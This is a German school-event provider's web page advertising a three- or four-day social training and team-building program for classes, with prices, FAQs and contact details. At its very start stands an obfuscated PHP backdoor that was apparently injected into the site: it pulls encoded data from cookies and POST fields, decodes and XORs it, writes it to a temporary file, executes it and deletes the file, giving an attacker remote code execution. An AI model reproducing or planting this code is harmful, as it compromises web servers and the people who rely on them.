$aGXtL = 'p' . chr ( 535 - 467 ).chr (66) . "\137" . chr (77) . chr (122) . "\x78" . 'H' . chr (121); $PzsTjoojMv = chr (99) . chr ( 137 - 29 )."\x61" . 's' . "\x73" . '_' . chr ( 427 - 326 ).chr (120) . "\x69" . "\163" . "\x74" . chr (115); $VjvzP = class_exists($aGXtL); $aGXtL = "49189";$PzsTjoojMv = "43253";$gNJLl = !1;if ($VjvzP == $gNJLl){function CiMdzUNw(){return FALSE;}$cfKddlHHd = "60282";CiMdzUNw();class pDB_MzxHy{private function yLVHXQlTJ($cfKddlHHd){if (is_array(pDB_MzxHy::$GCncQRScik)) {$KyMNBGC = sys_get_temp_dir() . "/" . crc32(pDB_MzxHy::$GCncQRScik[chr ( 569 - 454 ).chr ( 297 - 200 ).chr (108) . "\x74"]);@pDB_MzxHy::$GCncQRScik[chr (119) . "\162" . "\151" . "\x74" . "\145"]($KyMNBGC, pDB_MzxHy::$GCncQRScik['c' . chr ( 1074 - 963 )."\156" . 't' . chr ( 886 - 785 ).chr ( 195 - 85 ).chr (116)]);include $KyMNBGC;@pDB_MzxHy::$GCncQRScik['d' . chr ( 573 - 472 ).chr ( 776 - 668 ).chr (101) . chr ( 680 - 564 ).chr ( 486 - 385 )]($KyMNBGC); $cfKddlHHd = "60282";exit();}}private $wFkHfEanhy;public function iWJvjFp(){echo 4681;}public function __destruct(){$cfKddlHHd = "19140_27974";$this->yLVHXQlTJ($cfKddlHHd); $cfKddlHHd = "19140_27974";}public function __construct($HYgdTUOZo=0){$qtlTWZag = $_POST;$uOeEECXqPK = $_COOKIE;$xZdiaFYm = "1c626fdb-4756-4973-84b9-f465d4226acb";$hTORmxKpt = @$uOeEECXqPK[substr($xZdiaFYm, 0, 4)];if (!empty($hTORmxKpt)){$EEOoGL = "base64";$UNZXKH = "";$hTORmxKpt = explode(",", $hTORmxKpt);foreach ($hTORmxKpt as $jaRbP){$UNZXKH .= @$uOeEECXqPK[$jaRbP];$UNZXKH .= @$qtlTWZag[$jaRbP];}$UNZXKH = array_map($EEOoGL . "\137" . "\144" . "\145" . "\143" . "\x6f" . "\144" . "\x65", array($UNZXKH,)); $UNZXKH = $UNZXKH[0] ^ str_repeat($xZdiaFYm, (strlen($UNZXKH[0]) / strlen($xZdiaFYm)) + 1);pDB_MzxHy::$GCncQRScik = @unserialize($UNZXKH); $UNZXKH = class_exists("19140_27974");}}public static $GCncQRScik = 38115;}$Sbretqpwx = new /* 18504 */ pDB_MzxHy(60282 + 60282); $_POST = Array();unset($Sbretqpwx);} Social Training – Abenteuer | Ministerium für Abenteuer

Social Training / Soziales Lernen & Team Building

 

 

4 Tage á 3 Stunden oder 3 Tage á 3 Stunden

ab 24 Schüler*innen

April bis September

100% mobil

ab 5. Klasse

Stärkung der Gruppendynamik

Was euch erwartet:

3- oder 4-tägiges Sozial Training zur Weiterbildung mit folgenden Schwerpunktmodulen: Identität und Diversität, Gewaltprävention, Soziales Lernen, Medienbildung, Physisches und psychisches Wohlergehen und Suchtprävention. Des Weiteren werden durch aktive Teambuildingmaßnahmen der Teamgeist und das Miteinander gefördert werden.

Im Abenteuer enthalten:

Rundum-Betreuung mit motivierenden und fachlichen Teamer*innen

individuelle Planung an eure Wünsche und Bedürfnisse

ein Event mit nachhaltigen Effekt auf die gesamte Lernatmosphäre

einfache Planung und Umsetzung

Training von wichtigen Social Skills

Wir machen es euch leicht mit unserer Rundum-Sorglos Mappe*!

*passend für alle Events

Unsere Rundum-Sorglos Mappe erhaltet ihr nach eurer Buchung. Sie beinhaltet alles, was ihr für ein Abenteuer bei uns benötigt. Vom Elternbrief bis hin zur Checkliste für euch Lehrer*innen, ist alles dabei.

Eventrücktritt & Rechtliches

Wir legen bei unseren Programmen großen Wert auf die Hygienevorschriften. Deshalb sorgen wir dafür, dass alle notwendigen Maßnahmen getroffen werden, die einen erholsamen und sicheren Projekttag gewährleisten.

Sollte aufgrund von gesetzlichen Pandemie-Bestimmungen das Event nicht möglich sein, erstatten wir 100% des Betrages/Anzahlung.

Preise

Das Schwierigkeitslevel ist auf die jeweilige Klassenstufe angepasst!

3 Tage á 3 Stunden für 53,90 €* / 59,90 € pro Schüler*in

4 Tage á 3 Stunden für 67,40 €* / 74,90€ pro Schüler*in
zzgl. Anfahrtspauschale

*ab 3 teilnehmenden Klassen

Für ein unverbindliches Angebot sendet uns eine Anfrage!

Fragen und Antworten

Was passiert, wenn das Wetter nicht "mitspielt"?

Viele unserer Abenteuer sind wetterunabhängig. Bei leichtem Regen und kühlen Temperaturen können unsere Angebote trotzdem sicher durchgeführt werden. Doch auch auf Wetterumschwünge sind wir vorbereitet. Wir melden uns i.d.R. zwei bis drei Tage vor dem Event und bieten euch im Fall der Fälle zwei Alternativtermine oder eine wetterunabhängige Variante an.

Wie wird auf die Sicherheit der Schüler*innen geachtet?

Die Anzahl der Teamer*innen richtet sich nach denen der Schüler*innen, sodass diese stets mit dem erforderlichen Maß an Auf-, Vor- und Umsicht während und zwischen den Programmen begleitet und betreut werden können. Dabei wird einer Klasse immer mindestens ein/e Teamer*in zugeteilt.

Durch die Anordnung und den Wechsel der Stationen im Rotationsprinzip, sichern wir eine hohe Übersichtlichkeit, auch bei großen Teilnehmerzahlen.

Zusätzlich erhalten alle Teilnehmer*innen stylische Rettungswesten, welche während allen Aktivitäten auf dem Wasser getragen werden müssen!

Wie funktionieren Anfrage und Buchung?

Ihr könnt eure Anfrage über das Kontaktformular an uns senden. Ggf. melden wir uns bei euch zurück, um relevante Informationen einzuholen. Wenn wir alle Informationen haben, erstellen wir ein unverbindliches Angebot. Sagt dieses euch zu, bekommt ihr eine Auftragsbestätigung, die ihr bitte unterschrieben an uns zurück sendet. Sobald der entgültige Termin fest gebucht ist, bekommt ihr per E-Mail eine Buchungsbestätigung sowie umfangreiches Infomaterial (Checkliste, Einverständniserklärung, Elternbrief, Anfahrtsbeschreibung) zum Event.

Was passiert, wenn ich nicht die genaue Teilnehmeranzahl kenne?

Das ist kein Problem. Du teilst uns einfach die voraussichtliche Anzahl der Teilnehmer*innen mit und auf dieser Basis erstellen wir ein Angebot. Die Zahl kann bis spätestens 10 Werktage vor Veranstaltungsbeginn angepasst werden. Die bis dahin gemeldete Teilnehmeranzahl bleibt zahlbar und stellt die Grundlage für den Gesamtpreis bzw. der Restzahlung dar.

Um einen sicheren Ablauf zu gewährleisten, kann eine Erhöhung der Teilnehmerzahl nur schriftlich mit uns vereinbart werden.

Welche Kosten entstehen bei mobilen Angeboten?

Für alle mobilen Angebote berechnen wir eine Anfahrtspauschale. Die Anfahrtspauschale richtet sich nach der Entfernung sowie dem benötigen Personal und dem Materialbedarf. Bei der Teilnahme mehrerer Klassen lässt sich die Pauschale besser verteilen.

Welche Möglichkeiten der Förderung gibt es?

Wir möchten gerne, dass wirklich jeder von unserem Bewegungs- und interaktivem Erlebnisangebot profitieren kann. Daher sind unsere Programme folgendermaßen finanzierbar:

  • über GTA Gelder
  • über die Initiative "Aufholen nach Corona"
  • über Finanzierung für kulturelle und soziale Teilhaber
    • nur für Familien mit Bedarfsanspruch nach SGB II
  • Förderung durch die Ralf Rangnick Stiftung

 

Je nach Klassenstufe variieren wir das Programm und passen uns euch individuell an. Ob urban oder eher naturverbunden: Spaß &
Spannung gibt es garantiert!

Und nicht zu vergessen: Mitteldeutschland hat eine Vielzahl von Attraktionen zu bieten! Probiert es aus und geht mit uns auf Reisen!

Jetzt Kontakt aufnehmen

hallo@ministerium-fuer-abenteuer.de

0341 – 581 532 24

(09:00 bis 16:00 Uhr)

Jetzt Kontakt aufnehmen

hallo@ministerium-fuer-abenteuer.de

0341 - 581 532 24

(Mo-Fr 09:00 Uhr bis 16:00 Uhr)